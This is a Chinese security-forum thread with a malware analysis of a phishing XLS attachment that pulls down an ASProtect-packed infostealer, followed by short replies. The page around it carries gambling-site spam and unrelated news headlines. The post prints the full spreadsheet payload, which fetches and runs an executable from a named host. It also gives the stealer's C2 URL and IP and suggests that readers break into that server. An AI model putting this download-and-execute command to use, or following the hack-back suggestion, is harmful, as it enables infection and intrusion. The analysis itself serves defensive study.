吾爱破解 - LCG - LSG |安卓破解|病毒分析|破解软件|青海快3规律 www.yvi63.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3607|回复: 64
上一主题 下一主题

青海酿皮的制作方法: [PC样本分析] 無碼原創丨藏匿在邮件里的“坏小子”

  [复制链接]
跳转到指定楼层
楼主
发表于 2018-7-3 10:06 | 只看该作者 回帖奖励 |倒序浏览
使用论坛附件上传样本压缩包时必须使用压缩密码?;?,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
不知从什么时候开始,我的垃圾邮件开始暴增,而且主题千奇百怪,有“再也不用去澳门赌博”、“免保人、免抵押”…等推广主题;有“南北方压岁钱差距有多大?”、“爱过才知道什么是痛”…的段子主题;也有“+我微信 dw178gg”、“加扣扣 2848116852”...的交友主题;这些大部分都能从标题就能判断出来是垃圾邮件,像那种日文、繁体字糅杂在一起的邮件就很难辨别,每次我都要点开看一看里面有什么??瓤?,言归正传,这里面最让人头痛的还是藏匿在正常邮件里的病毒和钓鱼欺诈邮件,这些“坏小子”们可不仅仅骗个点击而已,稍有不慎我们损失的可能非常多...

一、基本信息[td]
文件名
xx电子账单.xls
SAH25661472720ecd1f63f92593e271c0f1220001d0b2fe32a5ce732eb55c7b19c4e50
[td]
文件名
SwiftCopy.exe
SHA256db34f7a1ed8dfaf299cc0024dfe8ee4d7e813a0f1e7bf5794db3676a4d07bdd5
这是我某个邮件中的 xls 文件,以及打开表格后下载的可疑文件。拿到可疑文件第一时间还是扔到“虚拟执行环境”中先让它自己可劲儿折腾一番,很快分析报告就出来了

很可惜,从沙箱报告中看不出特别关键的信息,只能从行为上看出些许端倪,接下来需要我手动开始分析了...
二、行为分析
上手之前准备工作要做足,先梳理下流程:

2.1 XLS 文件(Downloader)
原始样本是一个 xls 文件,主要功能是作为一个 downloader。此文件使用了外部链接功能,这是一种除宏,漏洞之外的另一种载荷投递的方式。打开文件后会提示你更新,点击更新后又会让你确定是否要启动 cmd 进程。


点击文档中的 #REF!可以看到将要执行的命令行代码
=cmd|'/c @echo Set objShell = CreateObject("Wscript.Shell") > Gm.vbs& @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download //www.mva.by/tags/SwiftCopy.exe%temp%Gm.exe&%temp%Gm.exe",0,True >> Gm.vbs& Gm.vbs'!A0
样本会从 www.mva.by/tags 中下载 SwiftCopy.exe 存放到临时目录下,然后运行。

2.2 SwiftCopy.exe 文件
使用 PEID 查一下壳,显示为 ASProtect,我的脱壳技术一塌糊涂,在网上找了一个 OD 的脚本,瞬间脱壳,感谢网友的分享,网友博客链接:https://blog.csdn.net/qingye2008/article/details/1898190脚本名为 Aspr2.XX_unpacker_v1.osc,大家可以从网上搜索一下这个名字,应该可以搜到。
脱完壳之后是一个 Delphi 程序,其主要目的是创建自身并注入,但是如果不经过九曲十八弯的操作显示不出他的强大,他会循环调用自身中的一些函数,调用次数为 0x3B,这些函数中大部分没什么实质性的作用,但是万万不可大意,这些函数中还有反沙箱的操作,通过获得光标的值,判断光标是否在移动,而且这个循环会连续循环 7 次。

最终样本会创建自身并注入,不用想,重点功能肯定在注入的这部分代码中。

2.3 子进程
待到父进程调用 ZwResumeThread 时附加到目标进程中,代码结构比较简单,如果参数中有-u参数,将会睡眠一段时间。

值得一提的是,程序中调用的系统函数都是动态获得的,从而大大增加了静态分析的难度。

此样本的重点功能就是信息窃取,可以说是相当的全面,循环调用函数,可以看到循环次数为 101,窃取的信息包含浏览器信息,邮箱信息,远程登陆客户端信息等。

此时的程序已经没有了混淆,进入函数后就可以看到程序要窃取信息的目标。

对这些函数进行统计,获得的信息如下(可以说是相当全面)
浏览器类:
Internet Explorer,Mozilla Firefox,Google Chrome,KMeleon,Comodo Dragon,Comodo IceDragon,SeaMonkey,Opera,Safari,CoolNovo,Rambler Nichrome,RockMelt,Baidu Spark,Chromium,Titan Browser,Torch Browser,Yandex.Browser,Epic Privacy Browser,Sleipnir Browser,Vivaldi,Coowon Browser,Superbird Browser,Chromodo Browser,Mustan Browser,360 Browser,Cyberfox (x32+x64),Pale Moon,Maxthon browser,Citrio Browser,Chrome Canary,Waterfox,Orbitum,Iridium,
读取浏览器的ini文件

读取登录数据



远程登录客户端类:
TotalCommander,FlashFXP,FileZilla,FARManager,CyberDuck,Bitvise,NovaFTP,NetDrive,NppFTP,FTPShell,SherrodFTP,MyFTP,FTPBox,FtpInfo,LinesFTP,FullSync,NexusFile,JaSFtp,FTPNow,Xftp,EasyFTP,GoFTP,NETFile,BlazeFtp,StaffFTP,DeluxeFTP,ALFTP,FTPGetter,WS_FTP,AbleFTp,Automize,RealVNC,TightVNC,Syncovery,mSecureWallet,SmartFTP,FreshFTP,BitKinex,UltraFXP,FTPRush,VandykSecureFX,OdinSecureFTPExpert,Fling,ClassicFTP,Maxthonbrowser,Kitty(login+privatekey),WinSCP,RemminaRDP,WinFTP,32BitFTP,FTPNavigator
获取用户名和密码



邮箱类:Outlook,MozillaThunderbird,Foxmail,Pocomail,Incredimail,GmailNotifierPro,SNetzMailer,Checkmail,OperaMail,FossaMail,MailSpeaker,yMail
获取用户名和密码


样本会根据不同的目标,通过不同的方式窃取数据,可见作者对这些信息相当熟悉。最终样本会将获得的信息发送到服务端,分析此样本捕获到的 url 为 //admino.gq/stan/ Panel/fre.php此域名对应的 IP 为 103.63.2.227,通过情报社区查询,标签有垃圾邮件、钓鱼。红客大佬们可以尝试入侵入侵,看看攻击者截获了多少信息。

接着样本会在 Roming 目录下创建一个文件夹,并将自身拷贝过去,命名为 618D9F. exe,并且将文件属性设置为隐藏。最后还将在一个无限循环中创建线程,此线程会调用窃取信息的函数,删除目标文件,下载文件并执行。
三、总结
其实这些使用电子邮件和主题吸引用户阅读并打开附件,大部分是针对企业或组织?!盎敌∽印泵俏弊暗姆绞椒浅6?,潜伏在一些 DOC、XLS、EXE 等常见的文件格式中也会让人放松警惕,一旦盲目打开或点击电子邮件中的链接,后果可能非常严重!最好的办法就是不要打开他们,不要冒任何感染风险,除非你会使用沙箱产品或具备文件分析的能力。
P.S. 这个样本功能齐全,信息量相当大,我也只分析个皮毛,对这个样本感兴趣的朋友们可以到微步云沙箱下载继续深度分析,肯定能够学到很多知识。
报告地址如下:https://s.threatbook.cn/report/file/db34f7a1ed8dfaf299cc0024dfe8ee4d7e813a0f1e7bf5794db3676a4d07bdd5/?env=win7_sp1_enx86_office2013&utm_campaign=analysis&utm_medium=tz&utm_source=Adconly&gio_link_id=nRbrzDR3

免费评分

参与人数 28威望 +1 吾爱币 +38 热心值 +27 收起 理由
13697945145 + 1 + 1 我很赞同!
chaims + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
yer + 1 + 1 谢谢@Thanks!
wen123300976 + 1 + 1 我很赞同!
181842 + 3 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
栗子熟了 + 1 + 1 用心讨论,共获提升!
O丶ne丨柒夜彡 + 1 + 1 热心回复!
馍馍无蚊 + 1 + 1 看不懂,但是觉得很厉害,赞一个
MYLQG2ZHX + 1 + 1 看不懂 流批
1455018613 + 1 热心回复!
乡恋 + 1 + 1 我很赞同!
Chlrun + 1 + 1 我很赞同!
_达圣 + 1 + 1 用心讨论,共获提升!
卖萌小分队 + 1 + 1 我很赞同!
子五十 + 1 + 1 我很赞同!
静叶流云 + 1 + 1 谢谢@Thanks!
liaozhen + 1 + 1 我很赞同!
哈哈1584699191 + 1 说的好复杂
lookerJ + 1 + 1 谢谢@Thanks!
Hmily + 1 + 10 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
独行风云 + 2 + 1 用心讨论,共获提升!
iteamo + 1 非常喜欢,希望楼主继续出一些类似的东西
crysky7ye + 1 + 1 我很赞同!
你还有我啊 + 1 + 1 热心回复!
心病 + 1 + 1 真的强
zedong + 1 + 1 我很赞同!
紫寒秋 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
notproblem + 1 + 1 用心讨论,共获提升!

查看全部评分

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

推荐
发表于 2018-7-3 10:48 | 只看该作者
企业里很多文员对电脑的操作仅存在会开机、运动鼠标、打开文件、保存文件、关机的水平,甚至电源插头没插紧、显示器没开,也会大叫电脑坏了的水平(本人亲历),对这些伪装得很深的木马病毒,根本是没有防范的。他们大多数靠安全软件,而安全软件也并不是万能的。

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

推荐
发表于 2018-7-3 10:51 | 只看该作者

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

沙发
发表于 2018-7-3 10:28 | 只看该作者
一般情况下,只要心理有防范都不会去点链接或者打开附件吧

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

藤椅
发表于 2018-7-3 10:31 | 只看该作者
我不懂这是啥,但是我看到标题上的无码 ,不由自主的I点进来了。。

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

板凳
发表于 2018-7-3 10:39 | 只看该作者
无码 ????????????????????????????????

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

报纸
发表于 2018-7-3 10:44 | 只看该作者
老哥这虚拟分析环境不错啊,指点一波???

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

8#
发表于 2018-7-3 10:59 | 只看该作者
什么东东?

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

9#
发表于 2018-7-3 11:01 | 只看该作者
这和无码原创有什么关系?请问

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

10#
发表于 2018-7-3 11:04 | 只看该作者
厉害了,这个技术分析帖子很6,

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】;

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:[email protected]

快速回复 收藏帖子 返回列表 搜索

RSS订阅|手机版|小黑屋|联系我们|青海快3规律 ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2018-7-11 00:40

Powered by Discuz!

© 2001-2017 Comsenz Inc.

快速回复 青海快3规律 返回列表
  • [大笑]阿Q都是这么说的。。。。。。 2018-08-15
  • 意料之中。美国若逼中国汇率升值,它自己会变成世界老二,所以只能直接动商品 2018-07-14
  • 肉毒梭菌感染相关新闻 2018-07-14
  • 马克思主义通过指导无产阶级革命建立起部分社会财富公有制而改变了人类历史发展进程,离开部分社会财富公有制的建立来谈“改变人类历史发展进程”纯粹是无稽之谈。 2018-07-13
  • 为迎香港回归,他用99天徒步走完京九线 2018-07-13
  • 别做梦了,醒醒吧。一个国家强大,教育是重要的。没有你说的那样美国妒忌心态。美国害怕的是中国不改革不开放,因为中国一旦做自己的企业,走自己的道路,对美国来说意味美 2018-07-12
  • 中国红旗9导弹相关新闻 2018-07-12
  • 写字楼起火 员工为保客户资料抱电脑主机逃下11楼 2018-07-11
  • 纪检监察机关加强扶贫领域监督执纪问责工作 2018-07-11
  • “十三五”规划出炉 古镇展望后五年发展蓝图 2018-07-11
  • 吃凉菜才是夏天的正经事 2018-07-10
  • 人民日报:中国经济稳步迈向高质量 2018-07-10
  • “亚洲第一海军”的蒙古国海军司令要管多少事儿?仨船俩炮六个兵 2018-07-10
  • 全新传祺GS4上市 祺云概念智慧SUV 2018-07-09
  • 暖心!高铁列车为他停靠三分钟 这一次没有人反对 2018-07-09
  • 388| 497| 1000| 767| 780| 963| 161| 285| 576| 403|